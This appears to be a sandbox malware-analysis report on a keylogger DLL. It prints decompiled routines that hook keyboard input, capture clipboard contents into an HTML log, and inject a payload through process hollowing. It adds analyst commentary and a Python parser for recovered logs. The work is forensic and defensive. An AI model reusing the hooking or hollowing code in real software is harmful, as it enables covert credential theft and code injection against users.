                  				intOrPtr _t330;
                  				intOrPtr _t331;
                  				void* _t333;
                  
                  				_t327 = __esi;
                  				_t326 = __edi;
                  				_t330 = _t331;
                  				_t268 = 0x2f;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t268 = _t268 - 1;
                  				} while (_t268 != 0);
                  				_push(_t268);
                  				_push(__ebx);
                  				_push(__esi);
                  				_t265 = _a16;
                  				_t100 = _a8;
                  				_push(_t330);
                  				_push(0x10008ba5);
                  				_push( *[fs:edx]);
                  				 *[fs:edx] = _t331;
                  				_t333 = _t100 -  *0x1000f68c; // 0xc1b9
                  				if(_t333 != 0) {
                  					__eflags = _t100 -  *0x1000f690; // 0xc1ba
                  					if(__eflags != 0) {
                  						__eflags = _t100 -  *0x1000f694; // 0xc1bc
                  						if(__eflags != 0) {
                  							__eflags = _t100 -  *0x1000f698; // 0x0
                  							if(__eflags != 0) {
                  								__eflags = _t100 -  *0x1000f69c; // 0xc1bd
                  								if(__eflags != 0) {
                  									__eflags = _t100 - 0x308;   // 0x308 = WM_DRAWCLIPBOARD (clipboard viewer chain)
                  									if(_t100 != 0x308) {
                  										__eflags = _t100 -  *0x1000f6a0; // 0xc1be
                  										if(__eflags != 0) {
                  											_push(_t265);
                  											_push(_a12);
                  											_push(_t100);
                  											_t101 = _a4;
                  											_push(_t101);
                  											L10004FE0();
                  											_v8 = _t101;
                  										} else {
                  											__eflags =  *0x1000e0b8;
                  											if( *0x1000e0b8 != 0) {
                  												_t109 =  *0x1000e0b8; // 0x0
                  												SetFilePointer(_t109, 0, 0, 0);
                  												_t111 =  *0x1000e0b8; // 0x0
                  												SetEndOfFile(_t111);
                  												 *0x1000f6c4 = 0;
                  												 *0x1000f6c8 = 0;
                  												__eflags =  *0x1000f6c1 - 1;
                  												if(__eflags == 0) {
                  													E10006710( &_v380, _t268, 0,  *0x1000f6c4,  *0x1000f6c8);
                  													_t271 =  *0x1000f6b4; // 0x0
                  													E10003988( &_v384, _t271, L"SOFTWARE\\", __eflags);
                  													E1000577C(0x80000001, _t265, L"LastSize", _v384, __esi, __eflags, 2, _v380);
                  												}
                  											}
                  										}
                  									} else {
                  										__eflags =  *0x1000f6d4;
                  										if( *0x1000f6d4 != 0) {
                  											_t121 = E100069DC(0, _t265,  &_v12, __esi);
                  											__eflags = _t121 - 1;
                  											if(_t121 == 1) {
                  												_t289 =  *0x1000e0b4; // 0x0
                  												E10003A34(_v12, _t289);
                  												if(__eflags != 0) {
                  													E100037AC(0x1000e0b4, _v12);
                  													E10008270(L"\r\n\r\n", _t265,  &_v352, __edi, _t327);
                  													_push(_v352);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard");
                  													_push(L" --- ");
                  													E10006B14(0x2f, _t265, 0x3a, 0x20, __edi, _t327,  &_v356);
                  													_push(_v356);
                  													_push(L"]</font>");
                  													E10008270(0x10008bcc, _t265,  &_v360, _t326, _t327);
                  													_push(_v360);
                  													_t133 =  *0x1000e0b4; // 0x0
                  													E10008270(_t133, _t265,  &_v364, _t326, _t327);
                  													_push(_v364);
                  													E10008270(0x10008bcc, _t265,  &_v368, _t326, _t327);
                  													_push(_v368);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
                  													E10008270(L"\r\n\r\n", _t265,  &_v372, _t326, _t327);
                  													_push(_v372);
                  													E100039EC();
                  													__eflags =  *0x1000e0b8 - 0xffffffff;
                  													if(__eflags != 0) {
                  														E100061F8(_v12,  &_v376, __eflags);
                  														E100037D0( &_v12, _v376);
                  														_t149 = E1000391C(_v12) + _t148;
                  														__eflags = _t149;
                  														_t151 =  *0x1000e0b8; // 0x0
                  														WriteFile(_t151, _v12, _t149,  &_v32, 0);
                  													}
                  													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
                  												}
                  											}
                  										}
                  									}
                  								} else {
                  									__eflags =  *0x1000f6d4;
                  									if( *0x1000f6d4 != 0) {
                  										_t153 =  *0x1000f69c; // 0xc1bd
                  										_v8 = _t153 + 1;
                  									}
                  								}
                  							} else {
                  								__eflags =  *0x1000f6d4;
                  								if( *0x1000f6d4 != 0) {
                  									_t158 =  *0x1000f6d4; // 0x0
                  									UnhookWindowsHookEx(_t158);
                  								}
                  								 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
                  							}
                  						} else {
                  							__eflags =  *0x1000f6d4;
                  							if( *0x1000f6d4 != 0) {
                  								_t161 =  *0x1000f6d4; // 0x0
                  								UnhookWindowsHookEx(_t161);
                  							}
                  							 *0x1000f6d4 = 0;
                  						}
                  						goto L42;
                  					} else {
                  						E10003770( &_v12);
                  						__eflags =  *0x1000f6d4;
                  						if( *0x1000f6d4 != 0) {
                  							_t209 =  *0x1000f6d4; // 0x0
                  							UnhookWindowsHookEx(_t209);
                  						}
                  						__eflags =  *0x1000e0b8 - 0xffffffff;
                  						if(__eflags != 0) {
                  							_t194 =  *0x1000e0b8; // 0x0
                  							SetFilePointer(_t194, 0, 0, 0);
                  							_t196 =  *0x1000e0b8; // 0x0
                  							_t197 = GetFileSize(_t196, 0);
                  							__eflags = 0;
                  							_v28 = _t197;
                  							_v24 = 0;
                  							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
                  							_t205 =  *0x1000e0b8; // 0x0
                  							ReadFile(_t205, _v12, _v28,  &_v32, 0);
                  							_t207 =  *0x1000e0b8; // 0x0
                  							SetFilePointer(_t207, 0, 0, 2);
                  						}
                  						_t301 =  *0x1000f684; // 0x0
                  						E10003988( &_v336, L"temp", _t301, __eflags);
                  						SetFileAttributesW(E1000390C(_v336), 0x80);
                  						_t302 =  *0x1000f684; // 0x0
                  						E10003988( &_v340, L"temp", _t302, __eflags);
                  						DeleteFileW(E1000390C(_v340));
                  						_t303 =  *0x1000f684; // 0x0
                  						E10003988( &_v344, L"temp", _t303, __eflags);
                  						_t266 = CreateFileW(E1000390C(_v344), 0x40000000, 0, 0, 2, 0, 0);
                  						__eflags = _t266 - 0xffffffff;
                  						if(__eflags != 0) {
                  							E100061F8(_v12,  &_v348, __eflags);
                  							E100037D0( &_v12, _v348);
                  							_t191 = E1000391C(_v12) + _t190;
                  							__eflags = _t191;
                  							WriteFile(_t266, _v12, _t191,  &_v32, 0);
                  						}
                  						CloseHandle(_t266);
                  						 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
                  						L42:
                  						_pop(_t282);
                  						 *[fs:eax] = _t282;
                  						_push(E10008BAC);
                  						E10003788( &_v384, 0x13);
                  						E10003788( &_v40, 2);
                  						return E10003788( &_v16, 2);
                  					}
                  				}
                  				_t328 = _t265;
                  				E100050D0( &_v308, _t328);
                  				VirtualFree(_t328, 0, 0x8000);
                  				E10006E78(_t265, __edi, _t328,  &_v36, _v308, _v304,  &_v300, _v44);
                  				E100037D0( &_v40, _v36);
                  				E10006974( &_v16);
                  				_t267 = E10008438(_v16, _t265, __edi, _t328);
                  				_t228 =  *0x1000f6d0; // 0x0
                  				E10003A34(_t228, _v16);
                  				if(_t333 == 0) {
                  					L6:
                  					E10003770( &_v16);
                  					L7:
                  					E10003A34(_v40, 0);
                  					if(0 != 0) {
                  						_t336 = _t267 - 1;
                  						if(_t267 == 1) {
                  							E10008270(_v36, _t267,  &_v328, _t326, _t328);
                  							E10003988( &_v12, _v328, _v16, _t336);
                  							_t337 =  *0x1000e0b8 - 0xffffffff;
                  							if( *0x1000e0b8 != 0xffffffff) {
                  								E100061F8(_v12,  &_v332, _t337);
                  								E100037D0( &_v12, _v332);
                  								_t244 = E1000391C(_v12);
                  								_t247 =  *0x1000e0b8; // 0x0
                  								WriteFile(_t247, _v12, _t244 + _t244,  &_v32, 0);
                  							}
                  						}
                  					}
                  					goto L42;
                  				}
                  				E10003A34(_v40, 0);
                  				if(0 == 0) {
                  					goto L6;
                  				} else {
                  					E100037AC(0x1000f6d0, _v16);
                  					_push(L"\r\n\r\n");
                  					_push(_v16);
                  					_push(0x10008bcc);
                  					_push(_v36);
                  					E100039EC();
                  					E10008270(L"\r\n\r\n", _t267,  &_v312, _t326, _t328);
                  					_push(_v312);
                  					_push(L"<FONT COLOR=\"blue\">[");
                  					_t256 =  *0x1000f6d0; // 0x0
                  					E10008270(_t256, _t267,  &_v316, _t326, _t328);
                  					_push(_v316);
                  					_push(0x10008c08);
                  					_push(L" --- ");
                  					E10006B14(0x2f, _t267, 0x3a, 0x20, _t326, _t328,  &_v320);
                  					_push(_v320);
                  					_push(L"</font>");
                  					E10008270(0x10008bcc, _t267,  &_v324, _t326, _t328);
                  					_push(_v324);
                  					E100039EC();
                  					goto L7;
                  				}
                  			}
                  Instruction addresses (one per decompiled line above, in source order):
                  0x10008568 0x10008568 0x10008569 0x1000856b 0x10008570 0x10008570 0x10008572 0x10008574 0x10008574 0x10008577
                  0x10008578 0x10008579 0x1000857a 0x1000857d 0x10008582 0x10008583 0x10008588 0x1000858b 0x1000858e 0x10008594
                  0x1000875b 0x10008761 0x100088e3 0x100088e9 0x1000890b 0x10008911 0x10008948 0x1000894e 0x1000896b 0x10008970
                  0x10008abc 0x10008ac2 0x10008b5b 0x10008b5f 0x10008b60 0x10008b61 0x10008b64 0x10008b65 0x10008b6a 0x10008ac8
                  0x10008ac8 0x10008acf 0x10008adb 0x10008ae1 0x10008ae6 0x10008aec 0x10008af1 0x10008afb 0x10008b05 0x10008b0c
                  0x10008b20 0x10008b34 0x10008b3f 0x10008b54 0x10008b54 0x10008b0c 0x10008acf 0x10008976 0x10008976 0x1000897d
                  0x10008988 0x1000898d 0x1000898f 0x10008998 0x1000899e 0x100089a3 0x100089b1 0x100089c1 0x100089c6 0x100089cc
                  0x100089d1 0x100089e9 0x100089ee 0x100089f4 0x10008a04 0x10008a09 0x10008a15 0x10008a1a 0x10008a1f 0x10008a30
                  0x10008a35 0x10008a3b 0x10008a4b 0x10008a50 0x10008a5e 0x10008a63 0x10008a6a 0x10008a75 0x10008a83 0x10008a96
                  0x10008a96 0x10008a9d 0x10008aa3 0x10008aa3 0x10008ab2 0x10008ab2 0x100089a3 0x1000898f 0x1000897d 0x10008950
                  0x10008950 0x10008957 0x1000895d 0x10008963 0x10008963 0x10008957 0x10008913 0x10008913 0x1000891a 0x1000891c
                  0x10008922 0x10008922 0x1000893e 0x1000893e 0x100088eb 0x100088eb 0x100088f2 0x100088f4 0x100088fa 0x100088fa
                  0x10008901 0x10008901 0x00000000 0x10008767 0x1000876a 0x1000876f 0x10008776 0x10008778 0x1000877e 0x1000877e
                  0x10008783 0x1000878a 0x10008792 0x10008798 0x1000879f 0x100087a5 0x100087aa 0x100087ac 0x100087af 0x100087c6
                  0x100087d9 0x100087df 0x100087ea 0x100087f0 0x100087f0 0x10008805 0x1000880b 0x1000881c 0x1000882c 0x10008832
                  0x10008843 0x10008862 0x10008868 0x1000887e 0x10008880 0x10008883 0x1000888e 0x1000889c 0x100088af 0x100088af
                  0x100088b7 0x100088b7 0x100088bd 0x100088d9 0x10008b6d 0x10008b6f 0x10008b72 0x10008b75 0x10008b85 0x10008b92
                  0x10008ba4 0x10008ba4 0x10008761 0x100085a5 0x100085aa 0x100085b7 0x100085db 0x100085e6 0x100085ee 0x100085fb
                  0x100085fd 0x10008605 0x1000860a 0x100086cd 0x100086d0 0x100086d5 0x100086da 0x100086df 0x100086e5 0x100086e8
                  0x100086f7 0x10008708 0x1000870d 0x10008714 0x10008723 0x10008731 0x1000873f 0x1000874b 0x10008751 0x10008751
                  0x10008714 0x100086e8 0x00000000 0x100086df 0x10008615 0x1000861a 0x00000000 0x10008620 0x10008628 0x1000862d
                  0x10008632 0x10008635 0x1000863a 0x10008645 0x10008655 0x1000865a 0x10008660 0x1000866b 0x10008670 0x10008675
                  0x1000867b 0x10008680 0x10008698 0x1000869d 0x100086a3 0x100086b3 0x100086b8 0x100086c6 0x00000000 0x100086c6

                  APIs
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00008000,00000000,10008BA5), ref: 10008751
                  • VirtualFree.KERNEL32(?,00000000,00008000,00000000,10008BA5,?,?,?,0000002E,00000000,00000000), ref: 100085B7
                    • Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File
                  Yara matches
                  Similarity
                  • API ID: Free$FileStringVirtualWrite
                  • String ID: $ --- $</font>$<FONT COLOR="blue">[$<FONT COLOR="red">[Clipboard$<FONT COLOR="red">[Clipboard End]</font>$LastSize$SOFTWARE\$]</font>$qualquercoisarsrsr$temp
                  • API String ID: 84115566-3009520543
                  • Opcode ID: 3e54d98d96c91ade860add0c425ff8f721c8a8c5c2a20d94251b01b29f7b05ae
                  • Instruction ID: 057d20e264fa80afaee32c8a6c883f4daf1d9cc34b90863f49a2566050bc1c08
                  • Opcode Fuzzy Hash: 3e54d98d96c91ade860add0c425ff8f721c8a8c5c2a20d94251b01b29f7b05ae
                  • Instruction Fuzzy Hash: 6DF16F74A00219ABFB51DB64CC81FDE73B9FB083C0F508065F148A72ADDB75AE858B65
                  Uniqueness

                  Uniqueness Score: -1.00%
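Read from the decompile, this routine looks like the window procedure of the keylogger (hwnd, message, wParam and lParam arrive as _a4 to _a16, and L10004FE0 is the default handler). A set of message IDs kept in globals (0xc1b9, 0xc1ba, 0xc1bc, 0xc1bd, 0xc1be, values in the range RegisterWindowMessage hands out) drive it: the 0xc1b9 branch reads the whole existing log (SetFilePointer to FILE_BEGIN, GetFileSize, ReadFile), copies it to a file named "temp" in the directory held at 0x1000f684 (SetFileAttributesW with FILE_ATTRIBUTE_NORMAL = 0x80, DeleteFileW, CreateFileW with GENERIC_WRITE = 0x40000000 and CREATE_ALWAYS = 2) and then installs the hook; SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0) is a WH_KEYBOARD_LL (13) hook with E10008040 as the hook procedure; the 0xc1ba branch unhooks; 0xc1bc re-hooks; 0x308 is WM_DRAWCLIPBOARD and appends the clipboard text; and the 0xc1be branch truncates the log (SetFilePointer plus SetEndOfFile) and, when the flag at 0x1000f6c1 is set, rewrites the "LastSize" value under HKEY_CURRENT_USER (0x80000001) in a SOFTWARE\ subkey named from 0x1000f6b4. Log entries are HTML fragments: a `<FONT COLOR="blue">[` header carrying the foreground window title and a " --- " timestamp that E10006B14 builds with '/', ':' and ' ' as separators, followed by the keystrokes, and clipboard snapshots bracketed by `<FONT COLOR="red">[Clipboard --- ...]</font>` and `<FONT COLOR="red">[Clipboard End]</font>`. Every WriteFile gets (length + length) bytes, so the file on disk is UTF-16LE.

The parser below for a recovered log is an added example written for this report; it is not code from the sample or from the sandbox. Its sample log is constructed, the "[ENTER]" and "[TAB]" key names in it are a guess at how E10006E78 renders special keys, and the exact position of the closing ']' in the window header is not recoverable from the decompile (the constants at 0x10008bcc and 0x10008c08 are not in the string list), so the pattern accepts both placements.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Markers taken from the string references in the decompile.  The constants at
# 0x10008bcc and 0x10008c08 are not in the string list, so where the ']' of the window
# header sits is unknown; the pattern accepts "[title --- ts]</font>" as well as
# "[title] --- ts</font>".
MARKER_RE = re.compile(
    r'(?P<win><FONT COLOR="blue">\[(?P<title>[^\r\n]*?)\]?\s*---\s*(?P<wts>[^\]<\r\n]*?)\]?</font>)'
    r'|(?P<cstart><FONT COLOR="red">\[Clipboard\s*---\s*(?P<cts>[^\]\r\n]*)\]</font>)'
    r'|(?P<cend><FONT COLOR="red">\[Clipboard End\]</font>)',
    re.IGNORECASE,
)

@dataclass
class LogEntry:
    kind: str               # "window" or "clipboard"
    timestamp: str          # raw text; the sample builds it with '/', ':' and ' ' separators
    title: Optional[str]    # foreground window title ("window" entries only)
    text: str               # keystrokes typed under that window, or clipboard contents

def parse_keylog(raw: bytes) -> List[LogEntry]:
    """Split a recovered log into window/clipboard entries.

    WriteFile is passed (length + length) bytes, so the file is UTF-16LE.
    """
    text = raw.decode("utf-16-le", errors="replace")
    marks = list(MARKER_RE.finditer(text))
    entries: List[LogEntry] = []
    i = 0
    while i < len(marks):
        m = marks[i]
        if m.group("win"):
            # keystrokes run up to the next marker of either kind
            nxt = marks[i + 1].start() if i + 1 < len(marks) else len(text)
            entries.append(LogEntry("window", m.group("wts").strip(), m.group("title").strip(),
                                    text[m.end():nxt].strip()))
            i += 1
        elif m.group("cstart"):
            j = i + 1
            if j < len(marks) and marks[j].group("cend"):
                body_end = marks[j].start()      # normal case: terminated snapshot
                i = j + 1
            else:                                # unterminated: body runs to the next marker
                body_end = marks[j].start() if j < len(marks) else len(text)
                i = j
            entries.append(LogEntry("clipboard", m.group("cts").strip(), None,
                                    text[m.end():body_end].strip()))
        else:
            i += 1  # stray end marker without a start: skip it
    return entries

def clipboard_captures(entries: List[LogEntry]) -> List[str]:
    """Clipboard snapshots in log order; credentials pasted from a manager show up here."""
    return [e.text for e in entries if e.kind == "clipboard"]

def keystrokes_by_window(entries: List[LogEntry]) -> Dict[str, str]:
    """Concatenate everything typed under each window title."""
    out: Dict[str, str] = {}
    for e in entries:
        if e.kind == "window":
            out[e.title] = out.get(e.title, "") + e.text
    return out

# Constructed sample log (not captured from the sample).  Special-key names such as
# "[ENTER]" are a guess at how E10006E78 renders them.
SAMPLE_LOG = (
    '\r\n\r\n<FONT COLOR="blue">[Untitled - Notepad --- 06/10/2021 14:02:11]</font>\r\n'
    'hello world[ENTER]\r\n'
    '\r\n\r\n<FONT COLOR="red">[Clipboard --- 06/10/2021 14:03:40]</font>\r\n'
    'P@ssw0rd!\r\n'
    '<FONT COLOR="red">[Clipboard End]</font>\r\n\r\n'
    '\r\n\r\n<FONT COLOR="blue">[Inbox - Mozilla Thunderbird --- 06/10/2021 14:05:02]</font>\r\n'
    'quarterly report[TAB]attached\r\n'
).encode("utf-16-le")

if __name__ == "__main__":
    for e in parse_keylog(SAMPLE_LOG):
        print(f"{e.timestamp}  {e.kind:<9} {e.title or ''!r:<32} {e.text!r}")
```

Run it against the log file itself, the "temp" copy next to it, and any UTF-16 blob recovered from the heap of the injected process; the three should agree except for the tail written since the last copy.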

                  C-Code - Quality: 71%
                  			E1000BD14(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx) {
                  				intOrPtr* _t69;
                  				void* _t73;
                  				int _t86;
                  				signed int _t152;
                  				void* _t153;
                  				signed int _t155;
                  				void* _t170;
                  				intOrPtr _t177;
                  				intOrPtr _t178;
                  				intOrPtr _t179;
                  				intOrPtr _t184;
                  				void* _t186;
                  				void* _t187;
                  				signed int _t188;
                  				intOrPtr* _t189;
                  				void* _t190;
                  				intOrPtr _t191;
                  				intOrPtr* _t192;
                  
                  				_t69 = __eax;
                  				asm("sbb [ebp+0xa111000], bh");
                  				_push(_t191);
                  				_t170 = __edx + 1;
                  				if(_t170 >= 0) {
                  					__eflags = 0;
                  					goto L11;
                  				} else {
                  					__ecx = __ecx + 1;
                  					__eflags = __ecx;
                  					if(__eflags < 0) {
                  						L11:
                  						_push(_t189);
                  						_push(0x1000bfdf);
                  						_push( *[fs:eax]);
                  						 *[fs:eax] = _t191;
                  						E100026E0(_t189 - 0x1c8, 0x44);
                  						_t73 = _t189 - 0x184;
                  						__eflags = 0;
                  						goto L12;
                  					} else {
                  						asm("popad");
                  						if(__eflags < 0) {
                  							 *__eax =  *__eax + __al;
                  							__eflags =  *__eax;
                  						}
                  						 *__eax =  *__eax + __al;
                  						 *__eax =  *__eax + __al;
                  						 *__eax =  *__eax + __al;
                  						asm("adc [eax], eax");
                  						 *__eax =  *__eax + __al;
                  						asm("sbb [eax], dl");
                  						 *__eax =  *__eax + __dl;
                  						asm("adc [ebp+0x6e], dl");
                  						__eflags =  *(__ecx + 0x6e + __ecx * 2) * 0x7463656a;
                  						if(__eflags < 0) {
                  							L12:
                  							_t192 = _t189;
                  							_pop(_t190);
                  							E100026E0(_t73, 0x10);
                  							E100026E0(_t190 - 0x294, 0xcc);
                  							 *(_t190 - 0x1c8) = 0x44;
                  							 *(_t190 - 0x294) = 0x10007;
                  							_t187 =  *(_t190 - 4);
                  							E1000BD50();
                  							E1000BD50();
                  							_t86 = CreateProcessW(0, E1000390C( *((intOrPtr*)(_t190 - 8))), 0, 0, 0, 4, 0, 0, _t190 - 0x1c8, _t190 - 0x184);
                  							__eflags = _t86;
                  							if(_t86 != 0) {
                  								Sleep(0xc8);
                  								GetThreadContext( *(_t190 - 0x180), _t190 - 0x294);
                  								ReadProcessMemory( *(_t190 - 0x184),  *((intOrPtr*)(_t190 - 0x1f0)) + 8, _t190 - 0x14, 4, _t190 - 0x10);
                  								NtUnmapViewOfSection( *(_t190 - 0x184), _t190 - 0x14);
                  								 *(_t190 - 0xc) = VirtualAllocEx( *(_t190 - 0x184),  *(_t190 - 0x118),  *(_t190 - 0xfc), 0x3000, 4);
                  								WriteProcessMemory( *(_t190 - 0x184),  *(_t190 - 0xc), _t187,  *(_t190 - 0xf8), _t190 - 0x10);
                  								_t186 =  *((intOrPtr*)(_t190 - 0x18)) + 0xf8;
                  								_t152 = ( *(_t190 - 0x146) & 0x0000ffff) - 1;
                  								__eflags = _t152;
                  								if(_t152 >= 0) {
                  									_t155 = _t152 + 1;
                  									_t188 = 0;
                  									__eflags = 0;
                  									do {
                  										_push(0);
                  										_push(_t186);
                  										asm("cdq");
                  										asm("adc edx, [esp+0x4]");
                  										_t192 = _t192 + 8;
                  										E1000BD50();
                  										WriteProcessMemory( *(_t190 - 0x184),  *(_t190 - 0xc) +  *((intOrPtr*)(_t190 - 0x168)),  *(_t190 - 4) +  *((intOrPtr*)(_t190 - 0x160)),  *(_t190 - 0x164), _t190 - 0x10);
                  										VirtualProtectEx( *(_t190 - 0x184),  *(_t190 - 0xc) +  *((intOrPtr*)(_t190 - 0x168)),  *(_t190 - 0x16c), 0x40, _t190 - 0x14);
                  										_t188 = _t188 + 1;
                  										_t155 = _t155 - 1;
                  										__eflags = _t155;
                  									} while (_t155 != 0);
                  								}
                  								__eflags = WriteProcessMemory( *(_t190 - 0x184),  *((intOrPtr*)(_t190 - 0x1f0)) + 8, _t190 - 0xc, 4, _t190 - 0x10) - 1;
                  								asm("sbb ebx, ebx");
                  								_t153 = _t152 + 1;
                  								 *((intOrPtr*)(_t190 - 0x1e4)) =  *(_t190 - 0xc) +  *((intOrPtr*)(_t190 - 0x124));
                  								__eflags = _t153 - 1;
                  								if(_t153 == 1) {
                  									__eflags = SetThreadContext( *(_t190 - 0x180), _t190 - 0x294) - 1;
                  									asm("sbb ebx, ebx");
                  									__eflags = _t153 + 1;
                  									ResumeThread( *(_t190 - 0x180));
                  								}
                  							}
                  							_pop(_t177);
                  							 *[fs:eax] = _t177;
                  							__eflags = 0;
                  							_pop(_t178);
                  							 *[fs:eax] = _t178;
                  							_push(E1000C02E);
                  							E10003770(_t190 - 8);
                  							_t179 =  *E1000BD14; // 0x1000bd18
                  							return E10004590(_t190 - 4, _t179);
                  						} else {
                  							if(__eflags < 0) {
                  								 *_t189 =  *_t189 + _t69;
                  								asm("outsb");
                  								 *_t69 =  *_t69 + _t69;
                  								 *_t69 =  *_t69 + _t69;
                  								 *((intOrPtr*)(_t189 - 0x75)) =  *((intOrPtr*)(_t189 - 0x75)) + _t170;
                  								asm("in al, dx");
                  								_push(_t189);
                  								_push(0x1000bd01);
                  								_push( *[fs:eax]);
                  								 *[fs:eax] = _t191;
                  								 *0x1000f82c =  *0x1000f82c + 1;
                  								_pop(_t184);
                  								 *[fs:eax] = _t184;
                  								_push(E1000BD08);
                  								return 0;
                  							}
                  							__eax =  &(__eax[0]);
                  							_t6 = __edx - 0x974918;
                  							 *_t6 =  *(__edx - 0x974918) + __dl;
                  							__eflags =  *_t6;
                  							_t8 = __eax;
                  							__eax = __edx;
                  							__edx = _t8;
                  							return __eax;
                  						}
                  					}
                  				}
                  				goto L21;
                  			}

                  Instruction addresses (one per decompiled line above, in source order):
                  0x1000bd14 0x1000bd14 0x1000bd1a 0x1000bd1b 0x1000bd1c 0x1000bd92 0x00000000 0x1000bd1e 0x1000bd1e 0x1000bd1e
                  0x1000bd20 0x1000bd94 0x1000bd94 0x1000bd95 0x1000bd9a 0x1000bd9d 0x1000bdad 0x1000bdb2 0x1000bdb8 0x00000000
                  0x1000bd22 0x1000bd22 0x1000bd23 0x1000bd25 0x1000bd25 0x1000bd25 0x1000bd26 0x1000bd28 0x1000bd2a 0x1000bd2c
                  0x1000bd2e 0x1000bd30 0x1000bd32 0x1000bd34 0x1000bd37 0x1000bd40 0x1000bdb9 0x1000bdb9 0x1000bdb9 0x1000bdbf
                  0x1000bdd1 0x1000bdd6 0x1000bde0 0x1000bdea 0x1000bdf7 0x1000be10 0x1000be3a 0x1000be3f 0x1000be41 0x1000be4c
                  0x1000be5f 0x1000be7f 0x1000be8f 0x1000beb5 0x1000becf 0x1000bed7 0x1000bee4 0x1000bee5 0x1000bee7 0x1000beed
                  0x1000beee 0x1000beee 0x1000bef0 0x1000bef4 0x1000bef5 0x1000befe 0x1000bf02 0x1000bf06 0x1000bf19 0x1000bf46
                  0x1000bf69 0x1000bf6e 0x1000bf6f 0x1000bf6f 0x1000bf6f 0x1000bef0 0x1000bf96 0x1000bf99 0x1000bf9b 0x1000bfa5
                  0x1000bfab 0x1000bfae 0x1000bfc3 0x1000bfc6 0x1000bfc8 0x1000bfd0 0x1000bfd0 0x1000bfae 0x1000bfd7 0x1000bfda
                  0x1000c003 0x1000c005 0x1000c008 0x1000c00b 0x1000c013 0x1000c01b 0x1000c026 0x1000bd43 0x1000bd43 0x1000bcd3
                  0x1000bcd6 0x1000bcd7 0x1000bcd9 0x1000bcdb 0x1000bcde 0x1000bce1 0x1000bce2 0x1000bce7 0x1000bcea 0x1000bced
                  0x1000bcf5 0x1000bcf8 0x1000bcfb 0x00000000 0x1000bcfb 0x1000bd46 0x1000bd47 0x1000bd47 0x1000bd47 0x1000bd48
                  0x1000bd48 0x1000bd48 0x1000bd4e 0x1000bd4e 0x1000bd40 0x1000bd20 0x00000000

                  APIs
                  • CreateProcessW.KERNEL32 ref: 1000BE3A
                  • Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE4C
                  • GetThreadContext.KERNEL32(?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE5F
                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 1000BE7F
                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 1000BE8F
                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000), ref: 1000BEB0
                  • WriteProcessMemory.KERNEL32(?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?,?,?,00000004,00000000,?), ref: 1000BECF
                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 1000BF46
                  • VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?,?,?), ref: 1000BF69
                  • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?), ref: 1000BF91
                  • SetThreadContext.KERNEL32(?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000), ref: 1000BFBE
                  • ResumeThread.KERNEL32(?,?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?), ref: 1000BFD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Process$Memory$ThreadWrite$ContextVirtual$AllocCreateProtectReadResumeSectionSleepUnmapView
                  • String ID: D
                  • API String ID: 251557703-2746444292
                  • Opcode ID: ddef249305afe7fb47cb9d0f556ca1214483f34f73db6a87cab3b00bcfcfae37
                  • Instruction ID: 51d3043d039fb927f3967ecafbc59ab6c1ff4cf1235e2731e9b23ce8e7e6b630
                  • Opcode Fuzzy Hash: ddef249305afe7fb47cb9d0f556ca1214483f34f73db6a87cab3b00bcfcfae37
                  • Instruction Fuzzy Hash: A8916FB5904259AFEB51DBA4CC81FEEB7BCEB49340F1140E6F208E7156DA34AE458B20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E1000BD60(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                  				void* _v8;
                  				char _v12;
                  				void _v16;
                  				long _v20;
